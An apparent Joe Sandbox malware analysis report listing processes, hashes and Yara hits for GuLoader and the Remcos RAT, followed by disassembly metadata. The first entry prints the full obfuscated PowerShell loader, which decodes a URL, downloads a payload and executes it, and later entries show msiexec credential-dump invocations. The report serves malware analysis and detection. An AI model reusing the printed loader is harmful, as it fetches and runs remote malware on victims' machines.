                                                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo F $WallIndy UnnsyrlVacaMilaHaesCe EFranB lsBen)sam ');while (!$Uforsonligste) {Unmudded (Perspicable ' Je$AnngMicl rao T.bNonaOmol ni:DavVFraiAr nR toansss aiFjetM kiNeme dksFno=I.t$Portplorsynu,rie la ') ;Unmudded $sabotren;Unmudded (Perspicable 'Zo sTusT reaPenRDertsp,-BorsCanl .aEU sEUnlp eg Tpp4H.l ');Unmudded (Perspicable ' e$NicgTunLUnioIntbsinaBruLCar:Oveu,ivf oOak r nfsFixosulNUnslsquiUplg ilsartt ubesal=A.d(DemtTheeHaes.unTRek- efp AraTr,tRegH Mu Per$ UvlBaryobsNTinLH.sa bla Ops UdeConNTols so) s ') ;Unmudded (Perspicable 'Lys$Ko,gA,bL ftO M BspiA ZoLEll: ToFMoroin rHjeKF glGlae taLBensOl.Es eRbo =Phy$,ntgUnsLHoooUnhbPunAW tLsa :Ac G muyIneg onI DesUdp+men+Bar% ek$Mu tForUFliAErgR ute.rugFjl.E lC teoCajUFjaNHe ts i ') ;$stigma=$Tuareg[$Forklelser];}$Flukily135=317872;$Dekodere=28798;Unmudded (Perspicable 'Var$ForGFrdlPhoOKonB slABall on: .lw.elAAchUCatKPerit ttsko Rau=Ext HinGCusEPretT.o-BovCUpsONumnTretPerE aan NeT Tr En$soulOpgy.arN Brl LaA evaKass,emEswinpapsBar ');Unmudded (Perspicable ' o$ R gAt l osoBrobKriaA rlskv:Obes L msaxe glschtBipe D oscas,sotshaeAlb Bre=smu Oms[ kksgenyAr s HetDraebe mDeg.sjaCEf,oBesnP.avAn e,ibr NetMrk]War: Li:IntFAttrDeloDvrmM,sB G a f.s KoePho6 or4radsHydtMisrPsyiOven afglit(udr$s iWPe aT,euBarkWoriUnctGon)Ita ');Unmudded (Perspicable 'kl $Bjrg.rhl BooUkrBD.va,aalPor:A,bBJakOR.ngd isUbeaHonmH nlBe eForRKomePen4Pre2Bie Reo=Rus M k[KursafnyLeas xttsepELinMDy .m.sTKame axE utCha. NoEsupN s,cDiso.ntDli,ITuanOscgBru]Ung: Bi:K ias isCracpu.IsmyIFoy.Im G lEs,gtPossshrttetRTrdi.liNM.lgTys(Fid$MorsFormL eEk nLOl TOldEBygosyns PeT arETon)B.n ');Unmudded (Perspicable 'Oen$Fidg MelOd Osymb itaBetl ak:Ta,dThlI onsEtcsWooiUltmBygI oL iEAderHinEMyoneffdTilE Fo=sun$ riBCh,o Amgs,asOveAAbsm AnlcarEsieRPyreLoe4Pan2Rio. prssymUBlobGresVe TMy rRekI un svg Ca( sv$.emFM llDaguBnkK uziGrnLst Y d 1Gen3 st5 yr, an$ ndDP.we D,k apo spD .oeIchRK je Bu)he ');Unmudded $dissimilerende;"
                                                                                      Imagebase:0x180000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2508157288.00000000080C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2486668247.000000000552C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2508605979.0000000009345000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:03:27:28
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff66e660000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:03:27:46
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                      Imagebase:0x730000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:03:28:01
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg"
                                                                                      Imagebase:0x730000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:03:28:01
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
                                                                                      Imagebase:0x730000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:03:28:02
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
                                                                                      Imagebase:0x730000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:13
                                                                                      Start time:03:28:02
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
                                                                                      Imagebase:0x730000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:14
                                                                                      Start time:03:28:02
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ownrimoexwdxbqdncvlwjzqsqkiyhshe"
                                                                                      Imagebase:0x730000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Executed Functions

                                                                                        Function 00007FFD3443B276 Relevance: 3.0, Strings: 2, Instructions: 470COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333142720.00007FFD34430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34430000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34430000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: M$M
                                                                                        • API String ID: 0-2122717962
                                                                                        • Opcode ID: 0de8d6ce462e32865d45679bbc92888e4bcccd31822afe734cc6b691a37bac44
                                                                                        • Instruction ID: 1d29605303af0dee527ef296f68c7dd2d234d6db45dcc54117c846ddb29c35fb
                                                                                        • Opcode Fuzzy Hash: 0de8d6ce462e32865d45679bbc92888e4bcccd31822afe734cc6b691a37bac44
                                                                                        • Instruction Fuzzy Hash: 06F19630A08A8D4FEBA8DF28C8657E937D1FF55310F04427EE84DC7296CB7899558B82
                                                                                        Function 00007FFD3443C022 Relevance: 3.0, Strings: 2, Instructions: 456COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333142720.00007FFD34430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34430000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34430000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: M$M
                                                                                        • API String ID: 0-2122717962
                                                                                        • Opcode ID: 1b35776eff401c6d2841ba3c534a0e00d891c0ab0ff35881c93da8514ef98c7b
                                                                                        • Instruction ID: 2af82e65eca64ff5b30546f06cebffe5ef2a459ef82f98b19112186a291a7343
                                                                                        • Opcode Fuzzy Hash: 1b35776eff401c6d2841ba3c534a0e00d891c0ab0ff35881c93da8514ef98c7b
                                                                                        • Instruction Fuzzy Hash: 7BE1B431A08A8D8FEBA8DF28C8657E977D1FB55711F04827EE84DC7295CF7898508B81
                                                                                        Function 00007FFD345097A6 Relevance: 3.9, Strings: 3, Instructions: 168COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: H"g4$H"g4$H"g4
                                                                                        • API String ID: 0-2809520548
                                                                                        • Opcode ID: 30aae7e13cf8649b9138de94b131b30fb75963cb72e8bb5d55c5dc7d31b12f85
                                                                                        • Instruction ID: 584278f927ffe6f933bd1cde662088da8d4a938a1e04af4749414368f77b61a4
                                                                                        • Opcode Fuzzy Hash: 30aae7e13cf8649b9138de94b131b30fb75963cb72e8bb5d55c5dc7d31b12f85
                                                                                        • Instruction Fuzzy Hash: 47510572E0DA850FEB65DB6888A5268B7E1FF56310F0801BED09CD719BCE286845CB42
                                                                                        Function 00007FFD3443BC36 Relevance: 2.8, Strings: 2, Instructions: 328COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333142720.00007FFD34430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34430000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34430000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: M$M
                                                                                        • API String ID: 0-2122717962
                                                                                        • Opcode ID: e9649bf24cfff150646f2c201215b283b6dfb5774b05567d61ad349cac1bb12b
                                                                                        • Instruction ID: 549e2bd6cf3d4f96cdc567f4c878121e0ab6fb14189f202d80010bd1c1416818
                                                                                        • Opcode Fuzzy Hash: e9649bf24cfff150646f2c201215b283b6dfb5774b05567d61ad349cac1bb12b
                                                                                        • Instruction Fuzzy Hash: 62B1B930608A8D4FEB69DF28C8657E937E1FF55310F04427EE84DC7296CA789955CB82
                                                                                        Function 00007FFD3443E5F2 Relevance: 1.9, Strings: 1, Instructions: 609COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333142720.00007FFD34430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34430000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34430000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8 i4
                                                                                        • API String ID: 0-3105713641
                                                                                        • Opcode ID: d2630b898f6979876b7988962376b77d0ce220c0ea241c450bb3fcc2914c2021
                                                                                        • Instruction ID: c28a92631fbc06876747d706784d5ce9a1e6bc766512f3ad34d704ee1abe17a5
                                                                                        • Opcode Fuzzy Hash: d2630b898f6979876b7988962376b77d0ce220c0ea241c450bb3fcc2914c2021
                                                                                        • Instruction Fuzzy Hash: 71F17230A18A4D8FDF98EF58C4A5AAD7BE1FF69700F25017AE40DD7295CA74E841CB81
                                                                                        Function 00007FFD34504689 Relevance: .5, Instructions: 522COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 83a875f08ed97d6cbe24a6c55d58cd939575341a99c9cfba31b3d8e31f883bbd
                                                                                        • Instruction ID: 95c0aa2b7d93687d12ce844547e6718764d3e1ac703f24cade8460df50645e56
                                                                                        • Opcode Fuzzy Hash: 83a875f08ed97d6cbe24a6c55d58cd939575341a99c9cfba31b3d8e31f883bbd
                                                                                        • Instruction Fuzzy Hash: EDE1F226F0DBC60FE7AB9B6858A61B57BD1EF83211B0801BED189C70D7DD1DAC069352
                                                                                        Function 00007FFD3450562D Relevance: .4, Instructions: 371COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 270196606bda8f386fc005494a5253613f7e5f5d5bbf24938438fe5cbfa2c366
                                                                                        • Instruction ID: 19e4b5713280e9c39e87b67d3ccd14fb074c9ff60d40c5eecb03887f293b7fd9
                                                                                        • Opcode Fuzzy Hash: 270196606bda8f386fc005494a5253613f7e5f5d5bbf24938438fe5cbfa2c366
                                                                                        • Instruction Fuzzy Hash: 31B13362F0DA8E4FEBA6DF2858A55B97BD1EF46320B1801BBD54DC71D7DD18AC009341
                                                                                        Function 00007FFD3450A416 Relevance: .2, Instructions: 170COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e1c8fd4c83b2d7d3813360e27fbb130b41265a7c1f6af0ca3547fefd738baf4f
                                                                                        • Instruction ID: a3e7e32e5c7e6cb9f66f7fa00e216e48918f84103ceab5febf5fd9a05ed57d5e
                                                                                        • Opcode Fuzzy Hash: e1c8fd4c83b2d7d3813360e27fbb130b41265a7c1f6af0ca3547fefd738baf4f
                                                                                        • Instruction Fuzzy Hash: F7510736F0DA850FE756DB5888A5278BBE1FF66310F0401BED05DD7197DE28AC498742
                                                                                        Function 00007FFD34505752 Relevance: .1, Instructions: 106COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 05d79c5ea9248c297adf00d6a387686160124dd8caa14d3c677cbd300683f03b
                                                                                        • Instruction ID: 4aac6d7825562fe48187c7d8c85a7f4b56e580135da63fe9d0674f6459419868
                                                                                        • Opcode Fuzzy Hash: 05d79c5ea9248c297adf00d6a387686160124dd8caa14d3c677cbd300683f03b
                                                                                        • Instruction Fuzzy Hash: E8313656F1E98A0BF7FADF1818F52B866C1EF46350F9805BAD60DD31C7DC0C68006241
                                                                                        Function 00007FFD34504814 Relevance: .1, Instructions: 96COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cb7fba931509e8e75f7578efc70d234f8a00e0548d674d136d5c70915ea1db72
                                                                                        • Instruction ID: acaff7d3f86aaf3049d0bc390f5ea8f553a902ba401d4bcbe96b161a7ed5cbb3
                                                                                        • Opcode Fuzzy Hash: cb7fba931509e8e75f7578efc70d234f8a00e0548d674d136d5c70915ea1db72
                                                                                        • Instruction Fuzzy Hash: C721B426F1DA8A0BF3BA9B6814F527462C2EF87252B5809BAD24DD31D6DD1DEC016241
                                                                                        Function 00007FFD3443B734 Relevance: .1, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333142720.00007FFD34430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34430000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34430000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a17375b7fd104cae0e4f6ed0ade50407b768e6d26f1c1bd36753a579557a86bc
                                                                                        • Instruction ID: 4cac08c884a2d5f18efc9a3f52756c966dcb1bcbb03dd31773979c617c0f4ddc
                                                                                        • Opcode Fuzzy Hash: a17375b7fd104cae0e4f6ed0ade50407b768e6d26f1c1bd36753a579557a86bc
                                                                                        • Instruction Fuzzy Hash: 32310A30A1868E8EFBB8AF14CC7ABF93290FF42715F410139D54DC6196CBB869A5DB11
                                                                                        Function 00007FFD3450189F Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aa2e404063144987be05b6185f9e32254046bc2bd8f7c152b242e60bb74e73b6
                                                                                        • Instruction ID: 9ad5b91a623ef303a3ac216df625ef9379d62b7184bb8f58d585500a5f03f010
                                                                                        • Opcode Fuzzy Hash: aa2e404063144987be05b6185f9e32254046bc2bd8f7c152b242e60bb74e73b6
                                                                                        • Instruction Fuzzy Hash: EA212356F0E9CA0FE76A972C18B91746BC1EF5A350B4805BED09DC71DBCC1E58068352
                                                                                        Function 00007FFD344341E5 Relevance: .0, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333142720.00007FFD34430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34430000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34430000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 545e9c8844bdb0bc558d94f749993f00fc34096500d33e97e86dfe21a8b956c8
                                                                                        • Instruction ID: 1334cb8ba2523d44fa2d14546a0808c5769743df89b5a85b7fe33d4a1852b0bb
                                                                                        • Opcode Fuzzy Hash: 545e9c8844bdb0bc558d94f749993f00fc34096500d33e97e86dfe21a8b956c8
                                                                                        • Instruction Fuzzy Hash: 8A01A73020CB0C4FDB44EF0CE051AA5B3E0FB95324F10052DE58AC3665D636E892CB41
                                                                                        Function 00007FFD34507B1A Relevance: .0, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 548df0e088e375577c08fe49e8e097fc2ea115f4c7f0ec23f2d5f71e5a84f07f
                                                                                        • Instruction ID: 8215bb4115b787a7c6fae7de3f72c23e528842744f59f4b1b826e40296520274
                                                                                        • Opcode Fuzzy Hash: 548df0e088e375577c08fe49e8e097fc2ea115f4c7f0ec23f2d5f71e5a84f07f
                                                                                        • Instruction Fuzzy Hash: 60F0ED2BB0CA0C0AE7A6976C58552F9B3D2EFC9132B550277C14ED3156ED26E8564250
                                                                                        Function 00007FFD34509FCB Relevance: .0, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b026203efad94641c1c7aa0bba043ce7ae0b86c5f2547ad0f4406dfe0ba3e448
                                                                                        • Instruction ID: 89cf1ad2bea5ebe70d750e6998290b97063cb355ba1902e59ce2c3dc3ae481ed
                                                                                        • Opcode Fuzzy Hash: b026203efad94641c1c7aa0bba043ce7ae0b86c5f2547ad0f4406dfe0ba3e448
                                                                                        • Instruction Fuzzy Hash: 6BF08C32B099484FDF95EB6898555E9B7F1FF68311B0000BAE00AD31A2DE28A8588B81
                                                                                        Function 00007FFD3450A7DB Relevance: .0, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b026203efad94641c1c7aa0bba043ce7ae0b86c5f2547ad0f4406dfe0ba3e448
                                                                                        • Instruction ID: 86ee8b78ae5826fa5f0ef8b7c2a989cee63856928a39443c2b93276abec47302
                                                                                        • Opcode Fuzzy Hash: b026203efad94641c1c7aa0bba043ce7ae0b86c5f2547ad0f4406dfe0ba3e448
                                                                                        • Instruction Fuzzy Hash: 0BF08C32B099484FDF95EF6898555E9B7F0FF68311B0000BBE00AD3162DE28AC588781
                                                                                        Function 00007FFD34507ED9 Relevance: .0, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
